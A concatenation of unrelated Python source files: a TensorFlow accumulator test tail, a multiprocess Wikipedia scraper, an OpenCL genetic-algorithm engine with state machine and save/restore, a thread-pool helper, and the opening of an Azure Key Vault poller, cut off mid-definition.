accum_ops = [q.apply_grad((np.float32(e),), local_step=e) for e in elems]
takeg_t = q.take_grad(1)
def apply_grad():
for accum_op in accum_ops:
time.sleep(1.0)
sess.run(accum_op)
apply_grad_thread = self.checkedThread(target=apply_grad)
results = []
def take_grad():
results.append(sess.run(takeg_t))
threads = [self.checkedThread(target=take_grad) for _ in range(10)]
for thread in threads:
thread.start()
apply_grad_thread.start()
for thread in threads:
thread.join()
apply_grad_thread.join()
self.assertItemsEqual(elems, results)
def testAccumulatorApplyAndBlockingTake(self):
with self.test_session() as sess:
q = tf.ConditionalAccumulator(
tf.float32, name="Q", shape=tf.TensorShape([1]))
elems = [10.0, 20.0, 30.0]
elems_ave = sum(elems) / len(elems)
accum_ops = [q.apply_grad((x,), local_step=0) for x in elems]
takeg_t = q.take_grad(3)
def apply_grad():
time.sleep(1.0)
for accum_op in accum_ops:
sess.run(accum_op)
return_array = []
def take_grad():
return_array.append(sess.run(takeg_t))
accum_thread = self.checkedThread(target=apply_grad)
takeg_thread = self.checkedThread(target=take_grad)
accum_thread.start()
takeg_thread.start()
accum_thread.join()
takeg_thread.join()
self.assertEqual([elems_ave], return_array)
def _blocking_takeg(self, sess, takeg_op):
with self.assertRaisesOpError("TakeGrad operation was cancelled"):
sess.run(takeg_op)
def testAccumulatorCancel(self):
with self.test_session() as sess:
q = tf.ConditionalAccumulator(
tf.float32, name="Q", shape=tf.TensorShape([1]))
takeg_t = q.take_grad(1)
takeg_thread = self.checkedThread(
self._blocking_takeg, args=(sess, takeg_t))
takeg_thread.start()
time.sleep(1.0)
sess.close() # Will cancel blocked operation
takeg_thread.join()
if __name__ == "__main__":
tf.test.main()
|
multiprocess_queue.py |
from urllib.request import urlopen
from bs4 import BeautifulSoup
import re
import random
from multiprocessing import Process, Queue
import os
import time
def task_delegator(taskQueue, foundUrlsQueue):
#Initialize with a task for each process
visited = ['/wiki/Kevin_Bacon', '/wiki/Monty_Python']
taskQueue.put('/wiki/Kevin_Bacon')
taskQueue.put('/wiki/Monty_Python')
while 1:
#Check to see if there are new links in the foundUrlsQueue for processing
if not foundUrlsQueue.empty():
links = [link for link in foundUrlsQueue.get() if link not in visited]
for link in links:
#Add new link to the taskQueue
taskQueue.put(link)
#Add new link to the visited list
visited.append(link)
def get_links(bsObj):
links = bsObj.find('div', {'id':'bodyContent'}).find_all('a', href=re.compile('^(/wiki/)((?!:).)*$'))
return [link.attrs['href'] for link in links]
def scrape_article(taskQueue, foundUrlsQueue):
while 1:
while taskQueue.empty():
#Sleep 100 ms while waiting for the task queue
#This should be rare
time.sleep(.1)
path = taskQueue.get()
html = urlopen('http://en.wikipedia.org{}'.format(path))
time.sleep(5)
bsObj = BeautifulSoup(html, 'html.parser')
title = bsObj.find('h1').get_text()
print('Scraping {} in process {}'.format(title, os.getpid()))
links = get_links(bsObj)
#Send these to the delegator for processing
foundUrlsQueue.put(links)
processes = []
taskQueue = Queue()
foundUrlsQueue = Queue()
processes.append(Process(target=task_delegator, args=(taskQueue, foundUrlsQueue,)))
processes.append(Process(target=scrape_article, args=(taskQueue, foundUrlsQueue,)))
processes.append(Process(target=scrape_article, args=(taskQueue, foundUrlsQueue,)))
for p in processes:
p.start()
|
ocl_ga.py | #!/usr/bin/python3
import os
import sys
import zlib
import time
import random
import numpy
import pickle
import pyopencl as cl
import threading
from . import utils
from .utilities.generaltaskthread import TaskThread, Task, Logger
## A decorator class to notify state change before/after the action.
class EnterExit(object):
def __call__(self, func):
def wrapper(parent, *args, **kwargs):
parent.state_machine.next(func.__name__)
func(parent, *args, **kwargs)
parent.state_machine.next('done')
return wrapper
## A class which manages the state trasition.
# @var openclga The OpenCLGA instance
# @var __curr_state Current state.
class StateMachine(Logger):
# (current state, action) : (next state)
TRANSITION_TABLE = {
('waiting', 'prepare') : ('preparing'),
('waiting', 'restore') : ('restoring'),
('preparing', 'done') : ('prepared'),
('prepared', 'run') : ('running'),
('restoring', 'done') : ('prepared'),
('running', 'pause') : ('pausing'),
('running', 'stop') : ('stopping'),
('pausing', 'done') : ('paused'),
('paused', 'run') : ('running'),
('paused', 'stop') : ('stopping'),
('paused', 'save') : ('saving'),
('stopping', 'done') : ('stopped'),
('saving', 'done') : ('paused'),
}
def __init__(self, openclga, init_state):
Logger.__init__(self)
self.openclga = openclga
self.__curr_state = init_state
## Transit to next state if (current state, action) is matched.
# After state changes, notify the change back to UI.
# @param action Could be the name of function or 'done'
def next(self, action):
next_state = None
for k, v in StateMachine.TRANSITION_TABLE.items():
if self.__curr_state == k[0] and action == k[1]:
assert next_state is None
next_state = v
if next_state is None:
return
last_state = self.__curr_state
self.__curr_state = next_state
self.info('Change State : {} => {}'.format(last_state, next_state))
if self.openclga.action_callbacks and 'state' in self.openclga.action_callbacks:
self.openclga.action_callbacks['state'](next_state)
def is_running(self):
return self.__curr_state == 'running'
## A task to iterate GA generation in a separated thread.
class GARun(Task):
def __init__(self, ga, prob_mutation, prob_crossover, callback):
Task.__init__(self)
self.ga = ga
self.prob_m = prob_mutation
self.prob_c = prob_crossover
self.end_of_run = callback
pass
def run(self):
start_time = time.time()
# No need to generate new population for pause or restore.
self.ga._generate_population_if_needed(self.prob_m, self.prob_c)
self.ga._start_evolution(self.prob_m, self.prob_c)
self.ga._elapsed_time += time.time() - start_time
self.end_of_run()
## Implementation of the flow of GA on OpenCL.
# Initialize opencl command queue, collect include path, build programs.
# @param options Used to initizlize all member variables
# @param action_callbacks Called when state is changed and carry execution status
# back to ocl_ga_worker.
class OpenCLGA():
def __init__(self, options, action_callbacks = {}):
if action_callbacks is not None:
for action, cb in action_callbacks.items():
assert callable(cb)
self.state_machine = StateMachine(self, 'waiting')
self.__init_members(options)
extra_path = options.get('extra_include_path', [])
cl_context = options.get('cl_context', None)
self.__init_cl(cl_context, extra_path)
self.__create_program()
self.action_callbacks = action_callbacks
## public properties
@property
def paused(self):
return self._paused
@property
def elapsed_time(self):
return self._elapsed_time
## private properties
@property
def __early_terminated(self):
return self.__sample_chromosome.early_terminated(self.__best_fitnesses[0],
self.__worst_fitnesses[0])
@property
def __args_codes(self):
opt_for_max = 0 if self.__opt_for_max == 'min' else 1
return '#define OPTIMIZATION_FOR_MAX ' + str(opt_for_max) + '\n'
@property
def __populate_codes(self):
return '#define POPULATION_SIZE ' + str(self.__population) + '\n' +\
'#define CHROMOSOME_TYPE ' + self.__sample_chromosome.struct_name + '\n'
@property
def __evaluate_code(self):
chromosome = self.__sample_chromosome
if self.__fitness_args is not None:
fit_args = ', '.join(['global ' + v['t'] + '* _f_' + v['n'] for v in self.__fitness_args])
fit_argv = ', '.join(['_f_' + v['n'] for v in self.__fitness_args])
if len(fit_args) > 0:
fit_args = ', ' + fit_args
fit_argv = ', ' + fit_argv
else:
fit_args = ''
fit_argv = ''
return '#define CHROMOSOME_SIZE ' + chromosome.chromosome_size_define + '\n' +\
'#define CALCULATE_FITNESS ' + self.__fitness_function + '\n' +\
'#define FITNESS_ARGS ' + fit_args + '\n'+\
'#define FITNESS_ARGV ' + fit_argv + '\n'
@property
def __include_code(self):
sample_gene = self.__sample_chromosome.genes[0]
return self.__sample_chromosome.kernelize() + '\n' +\
'#include "' + sample_gene.kernel_file + '"\n' +\
'#include "' + self.__sample_chromosome.kernel_file + '"\n\n'
## private methods
# @var __dictStatistics A dictionary. e.g. { gen : { 'best': best_fitness,
# 'worst': worst_fitness,
# 'avg': avg_fitness },
# 'avg_time_per_gen': avg. elapsed time per generation }
# @var thread The thread runs the actual algorithm.
# @var __population The number of population
# @var __termination A dictionary to identify the termination condition.
# If type is 'time', it means that the iteration will be
# ended after it runs the amount of time.
# If type is 'count', it means that the iteration will be
# ended when it runs the amount of iterations.
# @var __opt_for_max Larger fitness means better solution if 'max', smaller
# fitness is better if it's set to 'min'.
# @var __np_chromosomes The numpy memory which stores the dna of genes of all
# chromosomes.
# @var __is_elitism_mode Off = 0, On = 1. If On, spare chromosomes memory will
# be prepared to hold the best chromosomes of all clients.
# Then put these best of bests into next-gen population.
# @var __elitism_top The number of elites to be picked in each generation.
# @var __elitism_every The number of rounds for server to notify all clients
# that newly sorted elites are coming
# @var __elitism_interval The interval to get current elites since last time.
# @var __elitism_last_retrieval The timestamp of last time when retrieving elites.
# @var __elites_updated Indicating that newly sorted elites are received.
# These elites are going to be updated into dev memory.
# @var __best_fitnesses The list of top N best fitnesses
# @var __worst_fitnesses The list of bottom N worst fitnesses
# @var __best_indices The list of indices of top N best fitnesses
# @var __worst_indices The list of indices of bottom N worst fitnesses
# @var __avg The average of all fitnesses
# @var __extinction A dictionary to identify if a extinction is needed.
# If type is 'best_worst', an exticntion will be triggered
# when the difference between best fitness and worst fitness is
# smaller than expected value.
# If type is 'best_avg', the operation will be triggered
# when the difference between best fitness and avg fitness
# is smaller than expected value.
# @var _pausing_evt Wait when entering pausing state, it will be set right after
# that particular iteration ends.
def __init_members(self, options):
self.thread = TaskThread(name='GARun')
self.thread.daemon = True
self.thread.start()
self.__sample_chromosome = options['sample_chromosome']
self.__termination = options['termination']
self.__population = options['population']
self.__opt_for_max = options.get('opt_for_max', 'max')
self.__np_chromosomes = None
self.__fitness_function = options['fitness_func']
self.__fitness_kernel_str = options['fitness_kernel_str']
self.__fitness_args = options.get('fitness_args', None)
# For elitism_mode
elitism_info = options.get('elitism_mode', {})
self.__elitism_top = elitism_info.get('top', 1)
self.__elitism_every = elitism_info.get('every', 0)
self.__is_elitism_mode = all([self.__elitism_top, self.__elitism_every])
self.__elites_updated = False
self.__elitism_interval = elitism_info.get('interval', 0)
self.__elitism_last_retrieval = time.time()
self.__elitism_compressed = elitism_info.get('compress', False)
self.__elite_lock = threading.Lock()
# List of fitness and index.
size_of_indices = self.__elitism_top if self.__is_elitism_mode else 1
self.__best_fitnesses = numpy.zeros(size_of_indices, dtype=numpy.float32)
self.__worst_fitnesses = numpy.zeros(size_of_indices, dtype=numpy.float32)
self.__best_indices = numpy.zeros(size_of_indices, dtype=numpy.int32)
self.__worst_indices = numpy.zeros(size_of_indices, dtype=numpy.int32)
self.__avg = 0
self.__saved_filename = options.get('saved_filename', None)
self.__prob_mutation = options.get('prob_mutation', 0)
self.__prob_crossover = options.get('prob_crossover', 0)
self.__dictStatistics = {}
# Generally in GA, it depends on the problem to treat the maximal fitness
# value as the best or to treat the minimal fitness value as the best.
self.__fitnesses = numpy.zeros(self.__population, dtype=numpy.float32)
self._elapsed_time = 0
self._populated = False
self._pausing_evt = threading.Event()
self._paused = False
self._forceStop = False
self.__generation_index = 0
self.__generation_time_diff = 0
self.__debug_mode = 'debug' in options
self.__generation_callback = options['generation_callback']\
if 'generation_callback' in options else None
self.__extinction = options['extinction']\
if 'extinction' in options else None
def __init_cl(self, cl_context, extra_include_path):
# create OpenCL context, queue, and memory
# NOTE: Please set PYOPENCL_CTX=N (N is the device number you want to use)
# at first if it's in external_process mode, otherwise a exception
# will be thrown, since it's not in interactive mode.
# TODO: Select a reliable device during runtime by default.
self.__ctx = cl_context if cl_context is not None else cl.create_some_context()
self.__queue = cl.CommandQueue(self.__ctx)
self.__include_path = []
kernel_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'kernel')
paths = extra_include_path + [kernel_path]
for path in paths:
escapedPath = path.replace(' ', '^ ') if sys.platform.startswith('win')\
else path.replace(' ', '\\ ')
# After looking into the source code of pyopencl/__init__.py
# '-I' and folder path should be sepearetd. And ' should not included in string path.
self.__include_path.append('-I')
self.__include_path.append(os.path.join(os.getcwd(), escapedPath))
def __create_program(self):
codes = self.__args_codes + '\n' +\
self.__populate_codes + '\n' +\
self.__evaluate_code + '\n' +\
self.__include_code + '\n' +\
self.__fitness_kernel_str
kernel_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'kernel')
f = open(os.path.join(kernel_path, 'ocl_ga.cl'), 'r')
fstr = ''.join(f.readlines())
f.close()
if self.__debug_mode:
fdbg = open('final.cl', 'w')
fdbg.write(codes + fstr)
fdbg.close()
self.__prg = cl.Program(self.__ctx, codes + fstr).build(self.__include_path);
def __type_to_numpy_type(self, t):
if t == 'float':
return numpy.float32
elif t == 'int':
return numpy.int32
else:
raise 'unsupported python type'
def __dump_kernel_info(self, prog, ctx, chromosome_wrapper, device = None):
kernel_names = chromosome_wrapper.get_populate_kernel_names() +\
['ocl_ga_calculate_fitness'] +\
chromosome_wrapper.get_crossover_kernel_names() +\
chromosome_wrapper.get_mutation_kernel_names();
for name in kernel_names:
utils.calculate_estimated_kernel_usage(prog,
ctx,
name)
def __is_extinction_matched(self, best, avg, worst):
if self.__extinction is None:
return False
assert('type' in self.__extinction)
assert('diff' in self.__extinction)
if self.__extinction['type'] == 'best_worst':
return abs(best - worst) < self.__extinction['diff']
elif self.__extinction['type'] == 'best_avg':
return abs(best - avg) < self.__extinction['diff']
return False
def __prepare_fitness_args(self):
mf = cl.mem_flags
self.__fitness_args_list = [self.__dev_chromosomes, self.__dev_fitnesses]
self.__extra_fitness_args_list = []
if self.__fitness_args is not None:
## create buffers for fitness arguments
for arg in self.__fitness_args:
cl_buffer = cl.Buffer(self.__ctx,
mf.READ_WRITE | mf.COPY_HOST_PTR,
hostbuf=numpy.array(arg['v'],
dtype=self.__type_to_numpy_type(arg['t'])))
self.__extra_fitness_args_list.append(cl_buffer)
# concatenate two fitness args list
self.__fitness_args_list = self.__fitness_args_list + self.__extra_fitness_args_list
def __preexecute_kernels(self):
total_dna_size = self.__population * self.__sample_chromosome.dna_total_length
self.__fitnesses = numpy.zeros(self.__population, dtype=numpy.float32)
self.__np_chromosomes = numpy.zeros(total_dna_size, dtype=numpy.int32)
mf = cl.mem_flags
# Random number should be given by Host program because OpenCL doesn't have a random number
# generator. We just include one, Noise.cl.
rnum = [random.randint(0, 4294967295) for i in range(self.__population)]
## note: numpy.random.rand() gives us a list float32 and we cast it to uint32 at the calling
## of kernel function. It just views the original byte order as uint32.
self.__dev_rnum = cl.Buffer(self.__ctx, mf.READ_WRITE | mf.COPY_HOST_PTR,
hostbuf=numpy.array(rnum, dtype=numpy.uint32))
self.__dev_chromosomes = cl.Buffer(self.__ctx, mf.READ_WRITE | mf.COPY_HOST_PTR,
hostbuf=self.__np_chromosomes)
self.__dev_fitnesses = cl.Buffer(self.__ctx, mf.WRITE_ONLY, self.__fitnesses.nbytes)
self.__prepare_fitness_args()
if self.__is_elitism_mode:
self.__elites_updated = False
self.__current_elites = numpy.zeros(self.__sample_chromosome.dna_total_length * self.__elitism_top,
dtype=numpy.int32)
self.__dev_current_elites = cl.Buffer(self.__ctx, mf.READ_WRITE | mf.COPY_HOST_PTR,
hostbuf=self.__current_elites)
self.__updated_elites = numpy.zeros(self.__sample_chromosome.dna_total_length * self.__elitism_top,
dtype=numpy.int32)
self.__dev_updated_elites = cl.Buffer(self.__ctx, mf.READ_WRITE | mf.COPY_HOST_PTR,
hostbuf=self.__updated_elites)
self.__updated_elite_fitnesses = numpy.zeros(self.__elitism_top,
dtype=numpy.float32)
self.__dev_updated_elite_fitnesses = cl.Buffer(self.__ctx, mf.READ_WRITE | mf.COPY_HOST_PTR,
hostbuf=self.__updated_elite_fitnesses)
# For statistics
self.__dev_best_indices = cl.Buffer(self.__ctx, mf.READ_WRITE | mf.COPY_HOST_PTR,
hostbuf=self.__best_indices)
self.__dev_worst_indices = cl.Buffer(self.__ctx, mf.READ_WRITE | mf.COPY_HOST_PTR,
hostbuf=self.__worst_indices)
cl.enqueue_copy(self.__queue, self.__dev_fitnesses, self.__fitnesses)
## call preexecute_kernels for internal data structure preparation
self.__sample_chromosome.preexecute_kernels(self.__ctx, self.__queue, self.__population)
## dump information on kernel resources usage
self.__dump_kernel_info(self.__prg, self.__ctx, self.__sample_chromosome)
## Populate the first generation.
def _generate_population_if_needed(self, prob_mutate, prob_crossover):
if self._populated:
return
self._populated = True
self.__sample_chromosome.execute_populate(self.__prg,
self.__queue,
self.__population,
self.__dev_chromosomes,
self.__dev_rnum)
self.__prg.ocl_ga_calculate_fitness(self.__queue,
(self.__population,),
(1,),
*self.__fitness_args_list).wait()
def __examine_single_generation(self, index):
# we cannot extinct the first generation
if index == 0:
return
last_result = self.__dictStatistics[index - 1]
should_extinct = self.__is_extinction_matched(last_result['best'],
last_result['avg'],
last_result['worst'])
if should_extinct == False:
return
assert('ratio' in self.__extinction)
# To add 1 for preventing 0 if the population size is too small.
size = int(self.__population * self.__extinction['ratio']) + 1
self.__sample_chromosome.execute_populate(self.__prg,
self.__queue,
size,
self.__dev_chromosomes,
self.__dev_rnum)
def __execute_single_generation(self, index, prob_mutate, prob_crossover):
self.__examine_single_generation(index)
if self.__is_elitism_mode:
with self.__elite_lock:
if self.__elites_updated:
# Update current N elites to device memory.
self.__sample_chromosome.execute_update_current_elites(self.__prg,
self.__queue,
self.__elitism_top,
self.__dev_worst_indices,
self.__dev_chromosomes,
self.__dev_updated_elites,
self.__dev_fitnesses,
self.__dev_updated_elite_fitnesses)
self.__update_fitness_index_pair()
self.__elites_updated = False
best_fitness = self.__best_fitnesses[0]
self.__sample_chromosome.selection_preparation(self.__prg,
self.__queue,
self.__dev_fitnesses)
# We want to prevent the best one being changed.
if abs(self.__best_fitnesses[0] - self.__worst_fitnesses[0]) >= 0.00001:
self.__sample_chromosome.execute_crossover(self.__prg,
self.__queue,
self.__population,
index,
prob_crossover,
self.__dev_chromosomes,
self.__dev_fitnesses,
self.__dev_rnum,
best_fitness)
self.__sample_chromosome.execute_mutation(self.__prg,
self.__queue,
self.__population,
index,
prob_mutate,
self.__dev_chromosomes,
self.__dev_fitnesses,
self.__dev_rnum,
self.__extra_fitness_args_list)
self.__prg.ocl_ga_calculate_fitness(self.__queue,
(self.__population,),
(1,),
*self.__fitness_args_list).wait()
self.__update_fitness_index_pair()
best_result = None
elites_info = {}
if self.__is_elitism_mode and\
time.time() - self.__elitism_last_retrieval >= self.__elitism_interval:
# Find current N elites and their corresponding indices, then read
# it back from device memory to system memory.
self.__sample_chromosome.execute_get_current_elites(self.__prg,
self.__queue,
self.__elitism_top,
self.__dev_chromosomes,
self.__dev_current_elites,
self.__dev_best_indices)
cl.enqueue_copy(self.__queue, self.__current_elites, self.__dev_current_elites)
elites_info = self.__get_current_elites_info()
self.__elitism_last_retrieval = time.time()
best_result = pickle.dumps(elites_info)
if best_result and self.__elitism_compressed:
# Compress data with the highest level.
best_result = zlib.compress(best_result, 9)
self.__dictStatistics[index] = {}
self.__dictStatistics[index]['best'] = self.__best_fitnesses[0]
self.__dictStatistics[index]['worst'] = self.__worst_fitnesses[0]
self.__dictStatistics[index]['avg'] = self.__avg
self.__dictStatistics[index]['best_result'] = best_result
if self.__generation_callback is not None:
self.__generation_callback(index, self.__dictStatistics[index])
## This is called at the end of each generation.
# It helps to update current top N & bottom N fitnesses and indices of
# all chromosomes and then calculate the avg fitness.
# We calculate best / worst / avg fitness in system memory for
# better efficiency & code simplicity.
def __update_fitness_index_pair(self):
cl.enqueue_copy(self.__queue, self.__fitnesses, self.__dev_fitnesses)
ori = []
fitness_sum = 0.0
for idx, fitness in enumerate(self.__fitnesses):
ori.append((idx, fitness))
fitness_sum += fitness
self.__avg = fitness_sum / len(self.__fitnesses)
assert len(self.__best_indices) == len(self.__best_fitnesses)
assert len(self.__worst_indices) == len(self.__worst_fitnesses)
size_of_indices = len(self.__best_indices)
ori.sort(key=lambda item : item[1], reverse=self.__opt_for_max=='max')
tops = ori[:size_of_indices]
bottoms = ori[len(ori)-size_of_indices:]
for idx in range(size_of_indices):
self.__best_indices[idx] = tops[idx][0]
self.__best_fitnesses[idx] = tops[idx][1]
self.__worst_indices[idx] = bottoms[idx][0]
self.__worst_fitnesses[idx] = bottoms[idx][1]
cl.enqueue_copy(self.__queue, self.__dev_best_indices, self.__best_indices)
cl.enqueue_copy(self.__queue, self.__dev_worst_indices, self.__worst_indices)
def __evolve_by_count(self, count, prob_mutate, prob_crossover):
start_time = time.time()
for i in range(self.__generation_index, count):
self.__execute_single_generation(i, prob_mutate, prob_crossover)
if self.__early_terminated:
break
if self._paused:
self.__generation_index = i + 1
self.__generation_time_diff = time.time() - start_time
cl.enqueue_read_buffer(self.__queue, self.__dev_fitnesses, self.__fitnesses)
cl.enqueue_read_buffer(self.__queue, self.__dev_chromosomes, self.__np_chromosomes).wait()
break
if self._forceStop:
cl.enqueue_read_buffer(self.__queue, self.__dev_fitnesses, self.__fitnesses)
cl.enqueue_read_buffer(self.__queue, self.__dev_chromosomes, self.__np_chromosomes).wait()
break
def __evolve_by_time(self, max_time, prob_mutate, prob_crossover):
start_time = time.time()
while True:
self.__execute_single_generation(self.__generation_index, prob_mutate, prob_crossover)
# calculate elapsed time
elapsed_time = time.time() - start_time + self.__generation_time_diff
self.__generation_index = self.__generation_index + 1
if self.__early_terminated or elapsed_time > max_time:
break
if self._paused:
self.__generation_time_diff = time.time() - start_time
cl.enqueue_read_buffer(self.__queue, self.__dev_fitnesses, self.__fitnesses)
cl.enqueue_read_buffer(self.__queue, self.__dev_chromosomes, self.__np_chromosomes).wait()
break
if self._forceStop:
cl.enqueue_read_buffer(self.__queue, self.__dev_fitnesses, self.__fitnesses)
cl.enqueue_read_buffer(self.__queue, self.__dev_chromosomes, self.__np_chromosomes).wait()
break
def _start_evolution(self, prob_mutate, prob_crossover):
generation_start = time.time()
## start the evolution
if self.__termination['type'] == 'time':
self.__evolve_by_time(self.__termination['time'], prob_mutate, prob_crossover)
elif self.__termination['type'] == 'count':
self.__evolve_by_count(self.__termination['count'], prob_mutate, prob_crossover)
if self._paused:
return
cl.enqueue_read_buffer(self.__queue, self.__dev_fitnesses, self.__fitnesses)
cl.enqueue_read_buffer(self.__queue, self.__dev_chromosomes, self.__np_chromosomes).wait()
total_time_consumption = time.time() - generation_start + self.__generation_time_diff
avg_time_per_gen = total_time_consumption / float(len(self.__dictStatistics))
self.__dictStatistics['avg_time_per_gen'] = avg_time_per_gen
def __save_state(self, data):
# save data from intenal struct
data['generation_idx'] = self.__generation_index
data['statistics'] = self.__dictStatistics
data['generation_time_diff'] = self.__generation_time_diff
data['population'] = self.__population
# read data from kernel
rnum = numpy.zeros(self.__population, dtype=numpy.uint32)
cl.enqueue_copy(self.__queue, rnum, self.__dev_rnum)
cl.enqueue_copy(self.__queue, self.__fitnesses, self.__dev_fitnesses)
cl.enqueue_copy(self.__queue, self.__np_chromosomes, self.__dev_chromosomes)
# save kernel memory to data
data['rnum'] = rnum
data['fitnesses'] = self.__fitnesses
data['chromosomes'] = self.__np_chromosomes
data['best'] = self.__best_fitnesses[0]
data['worst'] = self.__worst_fitnesses[0]
data['avg'] = self.__avg
# save algorithm information
data['prob_mutation'] = self.__prob_mutation
data['prob_crossover'] = self.__prob_crossover
self.__sample_chromosome.save(data, self.__ctx, self.__queue, self.__population)
def __restore_state(self, data):
# restore algorithm information
self.__prob_mutation = data['prob_mutation']
self.__prob_crossover = data['prob_crossover']
self.__generation_index = data['generation_idx']
self.__dictStatistics = data['statistics']
self.__generation_time_diff = data['generation_time_diff']
self.__population = data['population']
rnum = data['rnum']
self.__fitnesses = data['fitnesses']
self.__np_chromosomes = data['chromosomes']
self.__best_fitnesses = data['best']
self.__worst_fitnesses = data['worst']
self.__avg = data['avg']
# build CL memory from restored memory
mf = cl.mem_flags
self.__dev_rnum = cl.Buffer(self.__ctx, mf.READ_WRITE | mf.COPY_HOST_PTR,
hostbuf=numpy.array(rnum, dtype=numpy.uint32))
self.__dev_chromosomes = cl.Buffer(self.__ctx, mf.READ_WRITE | mf.COPY_HOST_PTR,
hostbuf=self.__np_chromosomes)
self.__dev_fitnesses = cl.Buffer(self.__ctx, mf.WRITE_ONLY | mf.COPY_HOST_PTR,
hostbuf=self.__fitnesses)
self.__prepare_fitness_args()
self.__sample_chromosome.restore(data, self.__ctx, self.__queue, self.__population)
self._paused = True
# public methods
@EnterExit()
def prepare(self):
self.__preexecute_kernels()
def __end_of_run(self):
if self._paused:
self._pausing_evt.set()
else:
t = threading.Thread(target=self.stop)
t.daemon = True
t.start()
@EnterExit()
def run(self, arg_prob_mutate = 0, arg_prob_crossover = 0):
# This function is not supposed to be overriden
prob_mutate = arg_prob_mutate if arg_prob_mutate else self.__prob_mutation
prob_crossover = arg_prob_crossover if arg_prob_crossover else self.__prob_crossover
assert 0 < prob_mutate < 1, 'Make sure you have set it in options or passed when calling run.'
assert 0 < prob_crossover < 1, 'Make sure you have set it in options or passed when calling run.'
assert self.thread != None
self._forceStop = False
self._paused = False
task = GARun(self, prob_mutate, prob_crossover, self.__end_of_run)
self.thread.addtask(task)
@EnterExit()
def stop(self):
self._forceStop = True
if self.thread:
self.thread.stop()
self.thread = None
@EnterExit()
def pause(self):
self._paused = True
self._pausing_evt.wait()
self._pausing_evt.clear()
@EnterExit()
def save(self, filename = None):
assert self._paused, 'save is only availabled while paused'
data = dict()
self.__save_state(data)
fname = self.__saved_filename if self.__saved_filename else filename
f = open(fname, 'wb')
pickle.dump(data, f)
f.close()
@EnterExit()
def restore(self, filename = None):
fname = self.__saved_filename if self.__saved_filename else filename
# TODO : Should check file existence ?
f = open(fname, 'rb')
data = pickle.load(f)
f.close()
self.__restore_state(data)
def get_statistics(self):
return self.__dictStatistics
## Return a dictionary containers current elites and their fitnesses
# correspondingly. e.g.
# elites : abcdedabcdefdeeacbadeadebcda
# fitnesses : 4, 5.5, 3.7, 7.1
# dna_size : 7
# The total lenght of elites is 28. With dna_size being 7, you could
# divided elites into 4 seperate array. Each standands for a chromosome
# with corresponding fitnesses orderly.
def __get_current_elites_info(self):
elites_info = {}
if self.__is_elitism_mode:
elites_info = { 'elites' : self.__current_elites,
'fitnesses' : self.__best_fitnesses,
'dna_size' : self.__sample_chromosome.dna_total_length }
return elites_info
def get_the_best(self):
assert self.__opt_for_max in ['max', 'min']
best_fitness = eval(self.__opt_for_max)(value for value in self.__fitnesses)
best_index = list(self.__fitnesses).index(best_fitness)
# We had convert chromosome to a cyclic gene. So, the num_of_genes in CL is more than python
# by one.
startGeneId = best_index * (self.__sample_chromosome.num_of_genes)
endGeneId = (best_index + 1) * (self.__sample_chromosome.num_of_genes)
best = [v for v in self.__np_chromosomes[startGeneId:endGeneId]]
return best, best_fitness, self.__sample_chromosome.from_kernel_value(best)
## Update the top N(sorted) elites of all elites provided from all workers
# to chromosomes device memory.
def update_elites(self, elites):
assert self.__is_elitism_mode, 'Elitism Mode is {}'.format(self.__is_elitism_mode)
assert len(elites) == self.__elitism_top
if not self.state_machine.is_running():
return
with self.__elite_lock:
elites_dna_data = []
elites_fitnesses = []
# Concatenate all elites' dna / fitness into a single continuous memory
# layout.
for idx, elite_info in enumerate(elites):
fitness, elite_dna, worker_id = elite_info
if idx == 0:
print('updating {}/{} elites ... fitness = {} from worker {}'.format(idx+1, len(elites), fitness, worker_id))
elites_dna_data.extend(elite_dna)
elites_fitnesses.append(fitness)
# Convert the continuous memory to a device compatible memory layout.
self.__updated_elites = numpy.asarray(elites_dna_data, dtype=numpy.int32)
self.__updated_elite_fitnesses = numpy.asarray(elites_fitnesses, dtype=numpy.float32)
# Transfer it into device meory.
cl.enqueue_copy(self.__queue, self.__dev_updated_elites, self.__updated_elites)
cl.enqueue_copy(self.__queue, self.__dev_updated_elite_fitnesses, self.__updated_elite_fitnesses)
self.__elites_updated = True
|
thread_pool.py | # Copyright: 2011 Brian Harring <ferringb@gmail.com>
# License: GPL2/BSD 3 clause
from collections import deque
import threading
from types import GeneratorType
import queue
from snakeoil.compatibility import IGNORED_EXCEPTIONS
from snakeoil.demandload import demandload
demandload(
'multiprocessing:cpu_count',
)
def reclaim_threads(threads):
for x in threads:
try:
x.join()
except IGNORED_EXCEPTIONS:
raise
except Exception as e:
# should do something better here
pass
def map_async(iterable, functor, *args, **kwds):
per_thread_args = kwds.pop("per_thread_args", lambda: ())
per_thread_kwds = kwds.pop("per_thread_kwds", lambda: {})
parallelism = kwds.pop("threads", None)
if parallelism is None:
parallelism = cpu_count()
if hasattr(iterable, '__len__'):
# if there are less items than parallelism, don't
# spawn pointless threads.
parallelism = max(min(len(iterable), parallelism), 0)
# note we allow an infinite queue since .put below is blocking, and won't
# return till it succeeds (regardless of signal) as such, we do it this way
# to ensure the put succeeds, then the keyboardinterrupt can be seen.
q = queue.Queue()
results = deque()
kill = threading.Event()
kill.clear()
def iter_queue(kill, qlist, empty_signal):
while not kill.isSet():
item = qlist.get()
if item is empty_signal:
return
yield item
def worker(*args):
result = functor(*args)
if result is not None:
# avoid appending chars from a string into results
if isinstance(result, GeneratorType):
results.extend(result)
else:
results.append(result)
empty_signal = object()
threads = []
for x in range(parallelism):
tkwds = kwds.copy()
tkwds.update(per_thread_kwds())
targs = (iter_queue(kill, q, empty_signal),) + args + per_thread_args()
threads.append(threading.Thread(target=worker, args=targs, kwargs=tkwds))
try:
try:
for x in threads:
x.start()
# now we feed the queue.
for data in iterable:
q.put(data)
except:
kill.set()
raise
finally:
for x in range(parallelism):
q.put(empty_signal)
reclaim_threads(threads)
return results
|
_polling.py | # ------------------------------------
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT License.
# ------------------------------------
import logging
import time
import threading
import uuid
from typing import TYPE_CHECKING
from azure.core.polling import PollingMethod, LROPoller, NoPolling
from azure.core.exceptions import ResourceNotFoundError, HttpResponseError
try:
from urlparse import urlparse # type: ignore # pylint: disable=unused-import
except ImportError:
from urllib.parse import urlparse
from azure.core.tracing.decorator import distributed_trace
from azure.core.tracing.common import with_current_context
if TYPE_CHECKING:
# pylint: disable=ungrouped-imports
from typing import Any, Callable, Union, List, Optional
logger = logging.getLogger(__name__)
class KeyVaultOperationPoller(LROPoller):
"""Poller for long running operations where calling result() doesn't wait for operation to complete.
"""
# pylint: disable=arguments-differ
def __init__(self, polling_method):
